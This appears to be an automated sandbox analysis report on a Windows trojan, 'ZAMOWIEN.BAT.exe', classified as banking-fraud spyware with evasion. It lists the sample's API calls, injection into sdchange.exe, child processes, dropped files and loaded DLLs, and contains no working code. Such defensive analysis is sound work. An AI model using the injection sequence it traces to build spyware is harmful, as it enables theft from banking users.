          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

          E-Banking Fraud

          Source: Yara match File source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_377134E0 NtCreateMutant,LdrInitializeThunk,2_2_377134E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_37712EB0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_37712D10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_37712BC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_37712B90
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712A80 NtClose,LdrInitializeThunk,2_2_37712A80
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37713C30 NtOpenProcessToken,2_2_37713C30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37713C90 NtOpenThread,2_2_37713C90
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_377138D0 NtGetContextThread,2_2_377138D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37714570 NtSuspendThread,2_2_37714570
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37714260 NtSetContextThread,2_2_37714260
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712F30 NtOpenDirectoryObject,2_2_37712F30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712F00 NtCreateFile,2_2_37712F00
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712FB0 NtSetValueKey,2_2_37712FB0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712E50 NtCreateSection,2_2_37712E50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712E00 NtQueueApcThread,2_2_37712E00
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712ED0 NtResumeThread,2_2_37712ED0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712EC0 NtQuerySection,2_2_37712EC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712E80 NtCreateProcessEx,2_2_37712E80
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712D50 NtWriteVirtualMemory,2_2_37712D50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712DC0 NtAdjustPrivilegesToken,2_2_37712DC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712DA0 NtReadVirtualMemory,2_2_37712DA0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712C50 NtUnmapViewOfSection,2_2_37712C50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712C30 NtMapViewOfSection,2_2_37712C30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712C20 NtSetInformationFile,2_2_37712C20
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712C10 NtOpenProcess,2_2_37712C10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712CF0 NtDelayExecution,2_2_37712CF0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712CD0 NtEnumerateKey,2_2_37712CD0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712B20 NtQueryInformationProcess,2_2_37712B20
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712B10 NtAllocateVirtualMemory,2_2_37712B10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712B00 NtQueryValueKey,2_2_37712B00
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712BE0 NtQueryVirtualMemory,2_2_37712BE0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712B80 NtCreateKey,2_2_37712B80
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712A10 NtWriteFile,2_2_37712A10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712AC0 NtEnumerateValueKey,2_2_37712AC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_37712AA0 NtQueryInformationFile,2_2_37712AA0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_377129F0 NtReadFile,2_2_377129F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_377129D0 NtWaitForSingleObject,2_2_377129D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_373E3659 NtSetContextThread,2_2_373E3659
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_373E3C99 NtResumeThread,2_2_373E3C99
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 2_2_373E397A NtSuspendThread,2_2_373E397A
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2C30 NtMapViewOfSection,LdrInitializeThunk,4_2_043C2C30
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2CF0 NtDelayExecution,LdrInitializeThunk,4_2_043C2CF0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_043C2D10
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2E50 NtCreateSection,LdrInitializeThunk,4_2_043C2E50
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2F00 NtCreateFile,LdrInitializeThunk,4_2_043C2F00
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C29F0 NtReadFile,LdrInitializeThunk,4_2_043C29F0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2A10 NtWriteFile,LdrInitializeThunk,4_2_043C2A10
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2A80 NtClose,LdrInitializeThunk,4_2_043C2A80
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_043C2AC0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_043C2B10
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2B00 NtQueryValueKey,LdrInitializeThunk,4_2_043C2B00
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_043C2B90
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2B80 NtCreateKey,LdrInitializeThunk,4_2_043C2B80
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_043C2BC0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C34E0 NtCreateMutant,LdrInitializeThunk,4_2_043C34E0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C4570 NtSuspendThread,4_2_043C4570
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C4260 NtSetContextThread,4_2_043C4260
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2C20 NtSetInformationFile,4_2_043C2C20
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2C10 NtOpenProcess,4_2_043C2C10
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2C50 NtUnmapViewOfSection,4_2_043C2C50
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2CD0 NtEnumerateKey,4_2_043C2CD0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2D50 NtWriteVirtualMemory,4_2_043C2D50
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2DA0 NtReadVirtualMemory,4_2_043C2DA0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2DC0 NtAdjustPrivilegesToken,4_2_043C2DC0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2E00 NtQueueApcThread,4_2_043C2E00
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2EB0 NtProtectVirtualMemory,4_2_043C2EB0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2E80 NtCreateProcessEx,4_2_043C2E80
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2ED0 NtResumeThread,4_2_043C2ED0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2EC0 NtQuerySection,4_2_043C2EC0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2F30 NtOpenDirectoryObject,4_2_043C2F30
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2FB0 NtSetValueKey,4_2_043C2FB0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C29D0 NtWaitForSingleObject,4_2_043C29D0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2AA0 NtQueryInformationFile,4_2_043C2AA0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2B20 NtQueryInformationProcess,4_2_043C2B20
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C2BE0 NtQueryVirtualMemory,4_2_043C2BE0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C3C30 NtOpenProcessToken,4_2_043C3C30
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C3C90 NtOpenThread,4_2_043C3C90
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_043C38D0 NtGetContextThread,4_2_043C38D0
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_0474EFFA NtQueryInformationProcess,NtReadVirtualMemory,4_2_0474EFFA
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_0474F9B4 NtUnmapViewOfSection,NtClose,4_2_0474F9B4
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_04753668 NtSetContextThread,4_2_04753668
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_04753CA8 NtResumeThread,4_2_04753CA8
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_04753FC8 NtQueueApcThread,4_2_04753FC8
          Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4_2_04753988 NtSuspendThread,4_2_04753988
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe File created: C:\Windows\resources\0409
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe File created: C:\Windows\resources\0409\mysterist.ini
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044308354_2_04430835
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043A68824_2_043A6882
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0442C89F4_2_0442C89F
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043928C04_2_043928C0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0438E9A04_2_0438E9A0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444E9A64_2_0444E9A6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444EA5B4_2_0444EA5B
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444CA134_2_0444CA13
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04432AC04_2_04432AC0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04390B104_2_04390B10
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04404BC04_2_04404BC0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043FD4804_2_043FD480
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044254904_2_04425490
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044475C64_2_044475C6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444F5C94_2_0444F5C9
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0443D6464_2_0443D646
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044316234_2_04431623
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0442D62C4_2_0442D62C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044036EC4_2_044036EC
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444F6F64_2_0444F6F6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C508C4_2_043C508C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044470F14_2_044470F1
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0439B0D04_2_0439B0D0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0437F1134_2_0437F113
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043D717A4_2_043D717A
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0442D1304_2_0442D130
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AB1E04_2_043AB1E0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043951C04_2_043951C0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444124C4_2_0444124C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0437D2EC4_2_0437D2EC
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444F3304_2_0444F330
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043813804_2_04381380
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04393C604_2_04393C60
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04417CE84_2_04417CE8
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AFCE04_2_043AFCE0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04429C984_2_04429C98
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04447D4C4_2_04447D4C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444FD274_2_0444FD27
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0442FDF44_2_0442FDF4
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04399DD04_2_04399DD0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04391EB24_2_04391EB2
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04449ED24_2_04449ED2
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0440FF404_2_0440FF40
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444FF634_2_0444FF63
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04441FC64_2_04441FC6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04433FA04_2_04433FA0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044058704_2_04405870
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444F8724_2_0444F872
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043938004_2_04393800
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043998704_2_04399870
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AB8704_2_043AB870
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044418DA4_2_044418DA
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044478F34_2_044478F3
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044098B24_2_044098B2
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043D59C04_2_043D59C0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AFAA04_2_043AFAA0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444FA894_2_0444FA89
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043CDB194_2_043CDB19
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444FB2E4_2_0444FB2E
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04421B804_2_04421B80
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474EFFA4_2_0474EFFA
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474E4444_2_0474E444
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474E7E04_2_0474E7E0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474E3254_2_0474E325
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474D8A84_2_0474D8A8
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474CB334_2_0474CB33
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: String function: 376CB910 appears 275 times
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: String function: 3774E692 appears 86 times
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: String function: 37715050 appears 58 times
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: String function: 37727BE4 appears 101 times
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: String function: 3775EF10 appears 104 times
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 043FE692 appears 86 times
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 043C5050 appears 58 times
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 0437B910 appears 278 times
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 043D7BE4 appears 102 times
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 0440EF10 appears 105 times
          Source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesdchange.exej% vs ZAMOWIEN.BAT.exe
          Source: ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.000000003761D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ZAMOWIEN.BAT.exe
          Source: ZAMOWIEN.BAT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine | Classification label: mal96.troj.spyw.evad.winEXE@7/10@19/13
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403359
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046EC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_00402104
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | File created: C:\Users\user\AppData\Local\Temp\nsw67B4.tmp
          Source: ZAMOWIEN.BAT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | File read: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
          Source: unknown | Process created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Process created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
          Source: C:\Windows\SysWOW64\sdchange.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: dwmapi.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: oleacc.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: shfolder.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: powrprof.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: wkscli.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: umpdc.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Section loaded: fwpuclnt.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Section loaded: mswsock.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Section loaded: dnsapi.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Section loaded: iphlpapi.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Section loaded: fwpuclnt.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: ieframe.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: netapi32.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: windows.storage.dll
